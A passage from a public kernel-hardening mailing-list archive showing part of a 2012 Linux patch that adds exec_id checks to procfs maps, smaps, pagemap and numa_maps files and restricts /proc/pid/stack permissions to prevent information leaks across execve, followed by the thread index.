 	DIR("attr",      S_IRUGO|S_IXUGO, proc_attr_dir_inode_operations, proc_attr_dir_operations),
@@ -3371,7 +3512,7 @@ static const struct pid_entry tid_base_stuff[] = {
 	INF("wchan",     S_IRUGO, proc_pid_wchan),
 #endif
 #ifdef CONFIG_STACKTRACE
-	ONE("stack",      S_IRUGO, proc_pid_stack),
+	ONE("stack",      S_IRUSR, proc_pid_stack),
 #endif
 #ifdef CONFIG_SCHEDSTATS
 	INF("schedstat", S_IRUGO, proc_pid_schedstat),
diff --git a/fs/proc/internal.h b/fs/proc/internal.h
index 2925775..1828d3b 100644
--- a/fs/proc/internal.h
+++ b/fs/proc/internal.h
@@ -10,6 +10,7 @@
  */
 
 #include <linux/proc_fs.h>
+#include <linux/sched.h>
 
 extern struct proc_dir_entry proc_root;
 #ifdef CONFIG_PROC_SYSCTL
@@ -61,10 +62,19 @@ extern const struct file_operations proc_pagemap_operations;
 extern const struct file_operations proc_net_operations;
 extern const struct inode_operations proc_net_inode_operations;
 
-struct proc_maps_private {
+/*
+ * Internal proc_file_private is used to track procfs files being
+ * processed especially the ones that varies during runtime.
+ */
+struct proc_file_private {
+	/* The Execve ID of the task, use this to protect special procfs
+	 * files. Must be set at open time. */
+	u64 exec_id;
 	struct pid *pid;
+	struct inode *inode;
 	struct task_struct *task;
 #ifdef CONFIG_MMU
+	/* For /proc/pid/{maps,smaps...} */
 	struct vm_area_struct *tail_vma;
 #endif
 };
@@ -86,6 +96,24 @@ static inline int proc_fd(struct inode *inode)
 	return PROC_I(inode)->fd;
 }
 
+/**
+ * proc_exec_id_ok - check if the task's exec_id equals the exec_id of
+ * the proc_file_private.
+ * @task: Task struct to check against.
+ * @proc_private: The proc_file_private struct.
+ *
+ * Check if the exec_id of the two structs are equal. Use it to protect
+ * special procfs files when the fd is passed to a new execve (i.e. suid)
+ *
+ * It will be more effective if the check is delayed as mush as possible
+ * to avoid any new execve surprises.
+ */
+static inline int proc_exec_id_ok(struct task_struct *task,
+				  struct proc_file_private *proc_priv)
+{
+	return task_exec_id_ok(task, proc_priv->exec_id);
+}
+
 struct dentry *proc_lookup_de(struct proc_dir_entry *de, struct inode *ino,
 		struct dentry *dentry);
 int proc_readdir_de(struct proc_dir_entry *de, struct file *filp, void *dirent,
diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
index 7dcd2a2..7e11b69 100644
--- a/fs/proc/task_mmu.c
+++ b/fs/proc/task_mmu.c
@@ -90,7 +90,7 @@ static void pad_len_spaces(struct seq_file *m, int len)
 	seq_printf(m, "%*c", len, ' ');
 }
 
-static void vma_stop(struct proc_maps_private *priv, struct vm_area_struct *vma)
+static void vma_stop(struct proc_file_private *priv, struct vm_area_struct *vma)
 {
 	if (vma && vma != priv->tail_vma) {
 		struct mm_struct *mm = vma->vm_mm;
@@ -101,7 +101,7 @@ static void vma_stop(struct proc_maps_private *priv, struct vm_area_struct *vma)
 
 static void *m_start(struct seq_file *m, loff_t *pos)
 {
-	struct proc_maps_private *priv = m->private;
+	struct proc_file_private *priv = m->private;
 	unsigned long last_addr = m->version;
 	struct mm_struct *mm;
 	struct vm_area_struct *vma, *tail_vma = NULL;
@@ -168,7 +168,7 @@ out:
 
 static void *m_next(struct seq_file *m, void *v, loff_t *pos)
 {
-	struct proc_maps_private *priv = m->private;
+	struct proc_file_private *priv = m->private;
 	struct vm_area_struct *vma = v;
 	struct vm_area_struct *tail_vma = priv->tail_vma;
 
@@ -181,7 +181,7 @@ static void *m_next(struct seq_file *m, void *v, loff_t *pos)
 
 static void m_stop(struct seq_file *m, void *v)
 {
-	struct proc_maps_private *priv = m->private;
+	struct proc_file_private *priv = m->private;
 	struct vm_area_struct *vma = v;
 
 	if (!IS_ERR(vma))
@@ -193,15 +193,16 @@ static void m_stop(struct seq_file *m, void *v)
 static int do_maps_open(struct inode *inode, struct file *file,
 			const struct seq_operations *ops)
 {
-	struct proc_maps_private *priv;
+	struct proc_file_private *priv;
 	int ret = -ENOMEM;
 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
 	if (priv) {
-		priv->pid = proc_pid(inode);
+		priv->exec_id = current->exec_id;
 		ret = seq_open(file, ops);
 		if (!ret) {
 			struct seq_file *m = file->private_data;
 			m->private = priv;
+			priv->pid = proc_pid(inode);
 		} else {
 			kfree(priv);
 		}
@@ -278,9 +279,12 @@ static void show_map_vma(struct seq_file *m, struct vm_area_struct *vma)
 static int show_map(struct seq_file *m, void *v)
 {
 	struct vm_area_struct *vma = v;
-	struct proc_maps_private *priv = m->private;
+	struct proc_file_private *priv = m->private;
 	struct task_struct *task = priv->task;
 
+	if (!proc_exec_id_ok(current, priv))
+		return 0;
+
 	show_map_vma(m, vma);
 
 	if (m->count < m->size)  /* vma is copied successfully */
@@ -424,7 +428,7 @@ static int smaps_pte_range(pmd_t *pmd, unsigned long addr, unsigned long end,
 
 static int show_smap(struct seq_file *m, void *v)
 {
-	struct proc_maps_private *priv = m->private;
+	struct proc_file_private *priv = m->private;
 	struct task_struct *task = priv->task;
 	struct vm_area_struct *vma = v;
 	struct mem_size_stats mss;
@@ -434,6 +438,9 @@ static int show_smap(struct seq_file *m, void *v)
 		.private = &mss,
 	};
 
+	if (!proc_exec_id_ok(current, priv))
+		return 0;
+
 	memset(&mss, 0, sizeof mss);
 	mss.vma = vma;
 	/* mmap_sem is held in m_start */
@@ -757,15 +764,58 @@ static int pagemap_hugetlb_range(pte_t *pte, unsigned long hmask,
  * determine which areas of memory are actually mapped and llseek to
  * skip over unmapped regions.
  */
+
 #define PAGEMAP_WALK_SIZE	(PMD_SIZE)
 #define PAGEMAP_WALK_MASK	(PMD_MASK)
+static int pagemap_open(struct inode *inode, struct file *filp)
+{
+	struct proc_file_private *priv;
+	struct mm_struct *mm;
+	struct task_struct *task;
+	int ret = -ENOMEM;
+
+	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+	if (!priv)
+		return ret;
+
+	ret = -ESRCH;
+	task = get_proc_task(filp->f_path.dentry->d_inode);
+	if (!task)
+		goto out_free;
+
+	priv->exec_id = current->exec_id;
+	mm = mm_for_maps(task);
+	put_task_struct(task);
+
+	if (!mm) {
+		ret = -ENOENT;
+		goto out_free;
+	}
+
+	if (IS_ERR(mm)) {
+		ret = PTR_ERR(mm);
+		goto out_free;
+	}
+
+	filp->private_data = priv;
+	/* do not pin mm */
+	mmput(mm);
+
+	return 0;
+
+out_free:
+	kfree(priv);
+	return ret;
+}
+
 static ssize_t pagemap_read(struct file *file, char __user *buf,
 			    size_t count, loff_t *ppos)
 {
-	struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);
+	struct proc_file_private *priv = file->private_data;
+	struct task_struct *task;
 	struct mm_struct *mm;
 	struct pagemapread pm;
-	int ret = -ESRCH;
+	int ret = 0;
 	struct mm_walk pagemap_walk = {};
 	unsigned long src;
 	unsigned long svpfn;
@@ -773,6 +823,11 @@ static ssize_t pagemap_read(struct file *file, char __user *buf,
 	unsigned long end_vaddr;
 	int copied = 0;
 
+	if (!priv)
+		return ret;
+
+	ret = -ESRCH;
+	task = get_proc_task(file->f_path.dentry->d_inode);
 	if (!task)
 		goto out;
 
@@ -796,6 +851,12 @@ static ssize_t pagemap_read(struct file *file, char __user *buf,
 	if (!mm || IS_ERR(mm))
 		goto out_free;
 
+	if (!proc_exec_id_ok(current, priv)) {
+		/* There was an execve */
+		ret = 0;
+		goto out_mm;
+	}
+
 	pagemap_walk.pmd_entry = pagemap_pte_range;
 	pagemap_walk.pte_hole = pagemap_pte_hole;
 #ifdef CONFIG_HUGETLB_PAGE
@@ -857,9 +918,19 @@ out:
 	return ret;
 }
 
+static int pagemap_release(struct inode *inode, struct file *filp)
+{
+	struct proc_file_private *priv = filp->private_data;
+
+	kfree(priv);
+	return 0;
+}
+
 const struct file_operations proc_pagemap_operations = {
+	.open		= pagemap_open,
 	.llseek		= mem_lseek, /* borrow this */
 	.read		= pagemap_read,
+	.release	= pagemap_release,
 };
 #endif /* CONFIG_PROC_PAGE_MONITOR */
 
@@ -878,7 +949,7 @@ struct numa_maps {
 };
 
 struct numa_maps_private {
-	struct proc_maps_private proc_maps;
+	struct proc_file_private proc_maps;
 	struct numa_maps md;
 };
 
@@ -1005,7 +1076,7 @@ static int gather_hugetbl_stats(pte_t *pte, unsigned long hmask,
 static int show_numa_map(struct seq_file *m, void *v)
 {
 	struct numa_maps_private *numa_priv = m->private;
-	struct proc_maps_private *proc_priv = &numa_priv->proc_maps;
+	struct proc_file_private *proc_priv = &numa_priv->proc_maps;
 	struct vm_area_struct *vma = v;
 	struct numa_maps *md = &numa_priv->md;
 	struct file *file = vma->vm_file;
@@ -1018,6 +1089,9 @@ static int show_numa_map(struct seq_file *m, void *v)
 	if (!mm)
 		return 0;
 
+	if (!proc_exec_id_ok(current, proc_priv))
+		return 0;
+
 	/* Ensure we start with an empty set of numa_maps statistics. */
 	memset(md, 0, sizeof(*md));
 
@@ -1097,11 +1171,12 @@ static int numa_maps_open(struct inode *inode, struct file *file)
 	int ret = -ENOMEM;
 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
 	if (priv) {
-		priv->proc_maps.pid = proc_pid(inode);
+		priv->proc_maps.exec_id = current->exec_id;
 		ret = seq_open(file, &proc_pid_numa_maps_op);
 		if (!ret) {
 			struct seq_file *m = file->private_data;
 			m->private = priv;
+			priv->proc_maps.pid = proc_pid(inode);
 		} else {
 			kfree(priv);
 		}
diff --git a/include/linux/sched.h b/include/linux/sched.h
index 7d379a6..a06a3df 100644
--- a/include/linux/sched.h
+++ b/include/linux/sched.h
@@ -1420,6 +1420,9 @@ struct task_struct {
 #endif
 	seccomp_t seccomp;
 
+/* Execve counter: will be used to check if objects belong to the appropriate
+ * process image */
+	u64 exec_id;
 /* Thread group tracking */
    	u32 parent_exec_id;
    	u32 self_exec_id;
@@ -1752,6 +1755,23 @@ static inline int is_global_init(struct task_struct *tsk)
 	return tsk->pid == 1;
 }
 
+/**
+ * task_exec_id_ok - check if the task's exec_id equals the provided
+ * exec_id.
+ * @task: Task struct to check against.
+ * @exec_id: Execve ID.
+ *
+ * Check if the task's exec_id equals the provided exec_id. Use it to
+ * protect special objects.
+ *
+ * It will be more effective if the check is delayed as mush as possible
+ * to avoid any new execve surprises.
+ */
+static inline int task_exec_id_ok(struct task_struct *task, u64 exec_id)
+{
+	return task->exec_id == exec_id;
+}
+
 /*
  * is_container_init:
  * check whether in the task is init in its own pid namespace.


-- 
tixxdz
http://opendz.org

^ permalink raw reply related	[flat|nested] 16+ messages in thread

end of thread, other threads:[~2012-03-03  0:35 UTC | newest]

Thread overview: 16+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2012-02-10  2:06 [kernel-hardening] procfs: infoleaks and DAC permissions Djalal Harouni
2012-02-10 14:36 ` Vasiliy Kulikov
2012-02-11  9:20   ` Solar Designer
2012-02-11 10:21     ` Vasiliy Kulikov
2012-02-11 13:31       ` Solar Designer
2012-02-12  0:19   ` Djalal Harouni
2012-02-21 14:56   ` Solar Designer
2012-02-21 16:25     ` Djalal Harouni
2012-02-21 17:42       ` Solar Designer
2012-02-24  0:56     ` Solar Designer
2012-02-25  3:56       ` Solar Designer
2012-03-03  0:35         ` Djalal Harouni
2012-02-21 16:34   ` Djalal Harouni
2012-02-11 10:07 ` Solar Designer
2012-02-12 15:36   ` Djalal Harouni
2012-02-13 15:50     ` Djalal Harouni

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.